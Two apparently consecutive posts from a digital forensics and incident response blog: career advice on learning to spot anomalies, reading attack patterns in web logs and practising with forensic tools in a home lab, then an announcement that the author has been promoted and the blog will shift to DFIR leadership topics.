So, I have had more folks ask me about a career in Incident Response and Computer Forensics lately, so I thought I would expound a bit on my original post, How Do I Get There From Here.
I think it's worth mentioning again, that the thing that will propel you in your career, regardless of what that may be, is sheer desire. Getting up everyday, and thinking that you are not going to work because you have to, but rather that you get to go work doing something you love, makes a huge difference. I cannot stress that enough...to be a really good investigator, there is no other way.
Something else that I have recently discovered (thanks to some great Detectives) is a great skill to have is the ability to spot patterns and anomalies. So much of what we do in solving cases begins with finding something that just doesn't look right. You don't have to know exactly what it is, but you know something is just off will lead you down the path of taking a deep dive into that, "thing" which will either prove or disprove your hypothesis. Then, Sniper Forensics baby, you either use that finding to guide your investigation further, or you step back, formulate a new hypotheses, and drive on. But that initial "hrm...what are you" moment, is something you should experience throughout your investigations.
I spoke about this at a conference once, and I was asked, "How do I learn how to spot anomalies " Which is a valid questions...to which I answered, "By knowing what "normal" looks like". You need to put in the chair time. You need to know what processes should be running, from where, what is common, why - basically what makes a normal system look normal. I was a sysadmin for many years before I ever moved into security, which helped me tremendously once I moved into the DFIR world. If you don't have that background, then virtualization is a great thing. Fire up some VMs of different operating systems and just look at it. It sounds boring...but you know...wax on wax off...
Spotting patterns is a bit different. It requires you to be able to look at data elements and find similarities in them that could be anomalous. The best example I can think of is reviewing web logs for IOCs of SQL Injection or RFI. If you have ever seen these attacks in logs before, you know what I am referring to. You can actually see patterns of the attacker walking the database structure. If he's using an automated tool to do this, you can spot it a mile away - if you scroll through the logs, it looks like a series of shark fins. The same holds true for RFI attacks...you can spot the pattern of the attacker trying to get the system to upload his file. This is also the case for several different kids of attacks...they have visible patterns that after you put in some chair time, you can spot. Again, even if you don't know exactly what you're looking at just that it's unique when compared to it surroundings.
OK Chris...that's all well and good in theory, but that does not help me find a DFIR job. Do you have any recommendations that will help me actually get in the door? Great question...and Yes...yes I do.
OK...Bit of history...when I was a sysadmin at American Express in Phoenix, I used to admin both Windows and *nix servers (Solaris, AIX, and Linux). It was pretty cool, but kind of boring as it didn't present anything in the way of challenges (at least for me...no offence to Sysadmins...that's my roots!). So, I started looking into this whole security thing (this was about 2001). Pentest looked kewl to me. I knew how to make stuff work...let's see if I can learn how to break into those same systems. Since I didn't actually have a security job, I couldn't actually DO anything security related at work. So, I bought a copy of VMware, and started playing with tools. What was Metasploit and what did it do? What is ARP spoofing...can I do that at home? Basic research in my home lab. So, when I finally found an opening and got an interview, I was able to tell the hiring manager that all I have is what I found in the open source community, and my home lab, but I practice and research at home. I read books, blogs, and whitepapers trying to get as much knowledge as I could without actually doing the job. Well, I got the job for that very reason.
All of that to say...do that. If you want a job in DFIR and you are not currently working in DFIR, then research in your home lab. Take images of your systems, your ipod, your buddies laptops...whatever and start to play with the tools of the trade. Learn how to mount images, create timelines, parse data on the command line, learn how to use grep, gawk, and cut, use RegRipper to inspect registry hives...etc. Knowing which tool to use, when and why is critical! Remember, I rarely ever use commercial forensics tools. You can conduct comprehensive investigations without ever spending a dime!
So, if when somebody interviews you, and you tell them...I don't do this for a living but I want to and here is what I am doing to prepare myself for that, that should speak volumes about the type of employee you would be. I know for me, you would certainly shoot to the top of my list.
I hope that helps clarify things a bit for those of you that are seeking careers in DFIR. If there is something you would like me to expand on, please let me know! Or, if there is something I mentioned that you would like me to dig deeper into, please let me know. I am more than happy to help! After all, I may be interviewing you someday. It would be great to hear that you read my blog posts and so you did X.
Best of luck to you!
Wednesday, December 12, 2012
True to form, I am sitting the airport in Tulsa headed to Seattle for Blue Hat, and writing another blog post. A lot of has gone on over the past couple of months, so let me bring you up to speed and make a bit of an "announcement".
First, and most important (as it sets the stage for my "announcement") I was recently promoted from Managing Consultant of the US DFIR team to Director of the DFIR practice at Trustwave. I had a great boss in Colin Sheppard who was preparing me for the role, and once he left Trustwave, opened the door and made the recommendation for me to take on his role. I am truly excited about the opportunity and look forward to the new challenges it brings.
So, that brings me to my "announcement"...I will no longer be posting strictly technical content to The Digital Standard. I have truly enjoyed blogging about my work over the past few years and have even had the pleasure of meeting some of my readers. However, since my role has changed significantly, and I won't be working many cases going forward, I simply won't have the content to be able to write as many technical posts that I think would actually be worth reading.
Now, part two of the announcement is that I will be changing the focus of The Digital Standard from in the trenches DFIR work to DFIR Leadership and security management. Some of you may or may not know, but before I ever became technical, I was a business manager. I actually have my Bachelor's degree in Business Management. Additionally, I attended the US Army Warrant Officer Academy. As those of you who have attended military officer producing schools know, there is a heavy focus on situational leadership (AKA being skull drug) - a skill you either develop or you wash out (for the most part). That all to say, I actually have some experience in leadership, and feel that I have something of value to share.
Like all of my previous posts, I will intentionally be leaving out certain pieces of information. Not only do I have NDAs to adhere to, but I have to respect the anonymity of the people I am working with and that work with me.
For those of you that continue to read my sporadic posts, I hope you find value in my writing. Working in the DFIR community presents some of the most unique leadership challenges anywhere in the professional world. We joke with our clients, but it's so true, "Your worst day, in my every day". Living in someone else's nightmare certainly helps to hone your leadership and problem solving skills!
Also, if there is something that you would like me to research and/or write about, please let me know.
Also, Also - I am hopeful that my new position will permit me the time to do something I have been wanting to do for a couple of years now, write a Sniper Forensics book! No promises, but it's high on the "To Do" list for 2013. I have wanted to do it for many years, and due to the amount of case work I have been doing, I simply did not have the time. Now that I am not actively working cases, I may actually be able to write for a couple of hours every day. If any of you have any topics you FOR SURE would like to see covered in the book, please let me know. I am writing it for you all...I have the information in my head already. It wouldn't do me any good to write on something I think should be in there, if there are other things that you as the read (and purchaser) of the book would prefer to see.
Here is where I normally say, "Happy Hunting"....but considering the circumstances, I will have to work on something else to end my posts with...hrmmmmmmmm